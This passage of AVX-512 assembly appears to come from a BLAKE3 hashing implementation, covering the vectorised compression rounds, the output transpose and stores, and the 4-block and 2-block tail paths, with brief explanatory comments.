vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm22
vpaddd ymm1,ymm1,ymm25
vpaddd ymm2,ymm2,ymm27
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm21
vpaddd ymm1,ymm1,ymm16
vpaddd ymm2,ymm2,ymm31
vpaddd ymm3,ymm3,ymm17
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm26
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm30
vpaddd ymm3,ymm3,ymm29
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm23
vpaddd ymm1,ymm1,ymm25
vpaddd ymm2,ymm2,ymm19
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm20
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm21
vpaddd ymm3,ymm3,ymm17
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm16
vpaddd ymm1,ymm1,ymm18
vpaddd ymm2,ymm2,ymm24
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm28
vpaddd ymm1,ymm1,ymm25
vpaddd ymm2,ymm2,ymm31
vpaddd ymm3,ymm3,ymm30
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm29
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm26
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm23
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm16
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm18
vpaddd ymm1,ymm1,ymm19
vpaddd ymm2,ymm2,ymm17
vpaddd ymm3,ymm3,ymm20
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm25
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm24
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm30
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm28
vpaddd ymm3,ymm3,ymm17
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm29
vpaddd ymm1,ymm1,ymm16
vpaddd ymm2,ymm2,ymm18
vpaddd ymm3,ymm3,ymm20
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm19
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm22
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm27
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm17
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm31
vpaddd ymm1,ymm1,ymm16
vpaddd ymm2,ymm2,ymm25
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm30
vpaddd ymm1,ymm1,ymm18
vpaddd ymm2,ymm2,ymm19
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm26
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm20
vpaddd ymm3,ymm3,ymm29
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
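// Fold the 8-way state as in the 16-way path: rows 0-7 ^= rows 8-15,
// then rows 8-15 ^= the broadcast chaining value.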
vpxor ymm0,ymm0,ymm8
vpxor ymm1,ymm1,ymm9
vpxor ymm2,ymm2,ymm10
vpxor ymm3,ymm3,ymm11
vpxor ymm4,ymm4,ymm12
vpxor ymm5,ymm5,ymm13
vpxor ymm6,ymm6,ymm14
vpxor ymm7,ymm7,ymm15
vpxord ymm8,ymm8,DWORD PTR [rdi]{1to8}
vpxord ymm9,ymm9,DWORD PTR [rdi+0x4]{1to8}
vpxord ymm10,ymm10,DWORD PTR [rdi+0x8]{1to8}
vpxord ymm11,ymm11,DWORD PTR [rdi+0xc]{1to8}
vpxord ymm12,ymm12,DWORD PTR [rdi+0x10]{1to8}
vpxord ymm13,ymm13,DWORD PTR [rdi+0x14]{1to8}
vpxord ymm14,ymm14,DWORD PTR [rdi+0x18]{1to8}
vpxord ymm15,ymm15,DWORD PTR [rdi+0x1c]{1to8}
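// Transpose (two ymm rows per output block) and store the eight
// 64-byte outputs at [r9].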
vpunpckldq ymm16,ymm0,ymm1
vpunpckhdq ymm17,ymm0,ymm1
vpunpckldq ymm18,ymm2,ymm3
vpunpckhdq ymm19,ymm2,ymm3
vpunpckldq ymm20,ymm4,ymm5
vpunpckhdq ymm21,ymm4,ymm5
vpunpckldq ymm22,ymm6,ymm7
vpunpckhdq ymm23,ymm6,ymm7
vpunpckldq ymm24,ymm8,ymm9
vpunpckhdq ymm25,ymm8,ymm9
vpunpckldq ymm26,ymm10,ymm11
vpunpckhdq ymm27,ymm10,ymm11
vpunpckldq ymm28,ymm12,ymm13
vpunpckhdq ymm29,ymm12,ymm13
vpunpckldq ymm30,ymm14,ymm15
vpunpckhdq ymm31,ymm14,ymm15
vpunpcklqdq ymm0,ymm16,ymm18
vpunpckhqdq ymm1,ymm16,ymm18
vpunpcklqdq ymm2,ymm17,ymm19
vpunpckhqdq ymm3,ymm17,ymm19
vpunpcklqdq ymm4,ymm20,ymm22
vpunpckhqdq ymm5,ymm20,ymm22
vpunpcklqdq ymm6,ymm21,ymm23
vpunpckhqdq ymm7,ymm21,ymm23
vpunpcklqdq ymm8,ymm24,ymm26
vpunpckhqdq ymm9,ymm24,ymm26
vpunpcklqdq ymm10,ymm25,ymm27
vpunpckhqdq ymm11,ymm25,ymm27
vpunpcklqdq ymm12,ymm28,ymm30
vpunpckhqdq ymm13,ymm28,ymm30
vpunpcklqdq ymm14,ymm29,ymm31
vpunpckhqdq ymm15,ymm29,ymm31
vshufi32x4 ymm16,ymm0,ymm4,0x0
vshufi32x4 ymm17,ymm8,ymm12,0x0
vshufi32x4 ymm18,ymm1,ymm5,0x0
vshufi32x4 ymm19,ymm9,ymm13,0x0
vshufi32x4 ymm20,ymm2,ymm6,0x0
vshufi32x4 ymm21,ymm10,ymm14,0x0
vshufi32x4 ymm22,ymm3,ymm7,0x0
vshufi32x4 ymm23,ymm11,ymm15,0x0
vshufi32x4 ymm24,ymm0,ymm4,0x3
vshufi32x4 ymm25,ymm8,ymm12,0x3
vshufi32x4 ymm26,ymm1,ymm5,0x3
vshufi32x4 ymm27,ymm9,ymm13,0x3
vshufi32x4 ymm28,ymm2,ymm6,0x3
vshufi32x4 ymm29,ymm10,ymm14,0x3
vshufi32x4 ymm30,ymm3,ymm7,0x3
vshufi32x4 ymm31,ymm11,ymm15,0x3
vmovdqu32 YMMWORD PTR [r9],ymm16
vmovdqu32 YMMWORD PTR [r9+0x20],ymm17
vmovdqu32 YMMWORD PTR [r9+0x40],ymm18
vmovdqu32 YMMWORD PTR [r9+0x60],ymm19
vmovdqu32 YMMWORD PTR [r9+0x80],ymm20
vmovdqu32 YMMWORD PTR [r9+0xa0],ymm21
vmovdqu32 YMMWORD PTR [r9+0xc0],ymm22
vmovdqu32 YMMWORD PTR [r9+0xe0],ymm23
vmovdqu32 YMMWORD PTR [r9+0x100],ymm24
vmovdqu32 YMMWORD PTR [r9+0x120],ymm25
vmovdqu32 YMMWORD PTR [r9+0x140],ymm26
vmovdqu32 YMMWORD PTR [r9+0x160],ymm27
vmovdqu32 YMMWORD PTR [r9+0x180],ymm28
vmovdqu32 YMMWORD PTR [r9+0x1a0],ymm29
vmovdqu32 YMMWORD PTR [r9+0x1c0],ymm30
vmovdqu32 YMMWORD PTR [r9+0x1e0],ymm31
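// Slide the next batch of low/high counter words (offsets +0x20/+0x60)
// down into [rsp]/[rsp+0x40] and advance past the 8 blocks just written.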
vmovdqa ymm0,YMMWORD PTR [rsp+0x20]
vmovdqa ymm1,YMMWORD PTR [rsp+0x60]
vmovdqa YMMWORD PTR [rsp],ymm0
vmovdqa YMMWORD PTR [rsp+0x40],ymm1
add r9,0x200
sub r10,0x8
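// Tail for 4 remaining blocks: four independent 4x4 states live in the
// 128-bit lanes of zmm0-zmm3 (vbroadcasti32x4); the counter/length/flags
// row is assembled under kmask blends.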
2:
test r10,0x4
je 2f
vbroadcasti32x4 zmm0,XMMWORD PTR [rdi]
vbroadcasti32x4 zmm1,XMMWORD PTR [rdi+0x10]
vbroadcasti32x4 zmm2,XMMWORD PTR [BLAKE3_IV+rip]
vmovdqa xmm12,XMMWORD PTR [rsp]
vmovdqa xmm13,XMMWORD PTR [rsp+0x40]
vpunpckldq xmm14,xmm12,xmm13
vpunpckhdq xmm15,xmm12,xmm13
vpermq ymm14,ymm14,0xdc
vpermq ymm15,ymm15,0xdc
vpbroadcastd zmm12,edx
vinserti64x4 zmm13,zmm14,ymm15,0x1
mov eax,0x4444
kmovw k2,eax
vpblendmd zmm13{k2},zmm13,zmm12
vpbroadcastd zmm15,r8d
mov eax,0x8888
kmovw k4,eax
vpblendmd zmm3{k4},zmm13,zmm15
mov eax,0xaaaa
kmovw k3,eax
vbroadcasti32x4 zmm8,XMMWORD PTR [rsi]
vbroadcasti32x4 zmm9,XMMWORD PTR [rsi+0x10]
vshufps zmm4,zmm8,zmm9,0x88
vshufps zmm5,zmm8,zmm9,0xdd
vbroadcasti32x4 zmm8,XMMWORD PTR [rsi+0x20]
vbroadcasti32x4 zmm9,XMMWORD PTR [rsi+0x30]
vshufps zmm6,zmm8,zmm9,0x88
vshufps zmm7,zmm8,zmm9,0xdd
vpshufd zmm6,zmm6,0x93
vpshufd zmm7,zmm7,0x93
mov al,0x7
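// Seven double rounds: each iteration is a column round plus a diagonal
// round (rows rotated across lanes with vpshufd), with al as the counter.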
3:
vpaddd zmm0,zmm0,zmm4
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x10
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0xc
vpaddd zmm0,zmm0,zmm5
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x8
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0x7
vpshufd zmm0,zmm0,0x93
vpshufd zmm3,zmm3,0x4e
vpshufd zmm2,zmm2,0x39
vpaddd zmm0,zmm0,zmm6
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x10
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0xc
vpaddd zmm0,zmm0,zmm7
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x8
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0x7
vpshufd zmm0,zmm0,0x39
vpshufd zmm3,zmm3,0x4e
vpshufd zmm2,zmm2,0x93
dec al
je 3f
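// Permute the message vectors for the next round (the BLAKE3 schedule
// expressed as shufps/blend/unpack moves).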
vshufps zmm8,zmm4,zmm5,0xd6
vpshufd zmm9,zmm4,0xf
vpshufd zmm4,zmm8,0x39
vshufps zmm8,zmm6,zmm7,0xfa
vpblendmd zmm9{k3},zmm9,zmm8
vpunpcklqdq zmm8,zmm7,zmm5
vpblendmd zmm8{k4},zmm8,zmm6
vpshufd zmm8,zmm8,0x78
vpunpckhdq zmm5,zmm5,zmm7
vpunpckldq zmm6,zmm6,zmm5
vpshufd zmm7,zmm6,0x1e
vmovdqa32 zmm5,zmm9
vmovdqa32 zmm6,zmm8
jmp 3b
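// Rounds done: row0 ^= row2, row1 ^= row3, then row2/row3 ^= the
// chaining value; the four 64-byte outputs are scattered one 128-bit
// lane at a time.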
3:
vpxord zmm0,zmm0,zmm2
vpxord zmm1,zmm1,zmm3
vbroadcasti32x4 zmm8,XMMWORD PTR [rdi]
vbroadcasti32x4 zmm9,XMMWORD PTR [rdi+0x10]
vpxord zmm2,zmm2,zmm8
vpxord zmm3,zmm3,zmm9
vmovdqu XMMWORD PTR [r9],xmm0
vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
vextracti128 XMMWORD PTR [r9+0x40],ymm0,0x1
vextracti128 XMMWORD PTR [r9+0x50],ymm1,0x1
vextracti128 XMMWORD PTR [r9+0x60],ymm2,0x1
vextracti128 XMMWORD PTR [r9+0x70],ymm3,0x1
vextracti32x4 XMMWORD PTR [r9+0x80],zmm0,0x2
vextracti32x4 XMMWORD PTR [r9+0x90],zmm1,0x2
vextracti32x4 XMMWORD PTR [r9+0xa0],zmm2,0x2
vextracti32x4 XMMWORD PTR [r9+0xb0],zmm3,0x2
vextracti32x4 XMMWORD PTR [r9+0xc0],zmm0,0x3
vextracti32x4 XMMWORD PTR [r9+0xd0],zmm1,0x3
vextracti32x4 XMMWORD PTR [r9+0xe0],zmm2,0x3
vextracti32x4 XMMWORD PTR [r9+0xf0],zmm3,0x3
vmovdqa xmm0,XMMWORD PTR [rsp+0x10]
vmovdqa xmm1,XMMWORD PTR [rsp+0x50]
vmovdqa XMMWORD PTR [rsp],xmm0
vmovdqa XMMWORD PTR [rsp+0x40],xmm1
add r9,0x100
sub r10,0x4
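// Tail for 2 remaining blocks: the same lane scheme on 256-bit
// registers, with row 3 rebuilt from the saved counters via vpinsrd.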
2:
test r10,0x2
je 2f
vbroadcasti128 ymm0,XMMWORD PTR [rdi]
vbroadcasti128 ymm1,XMMWORD PTR [rdi+0x10]
vmovd xmm13,DWORD PTR [rsp]
vpinsrd xmm13,xmm13,DWORD PTR [rsp+0x40],0x1
vpinsrd xmm13,xmm13,edx,0x2
vmovd xmm14,DWORD PTR [rsp+0x4]
vpinsrd xmm14,xmm14,DWORD PTR [rsp+0x44],0x1
vpinsrd xmm14,xmm14,edx,0x2
vinserti128 ymm13,ymm13,xmm14,0x1
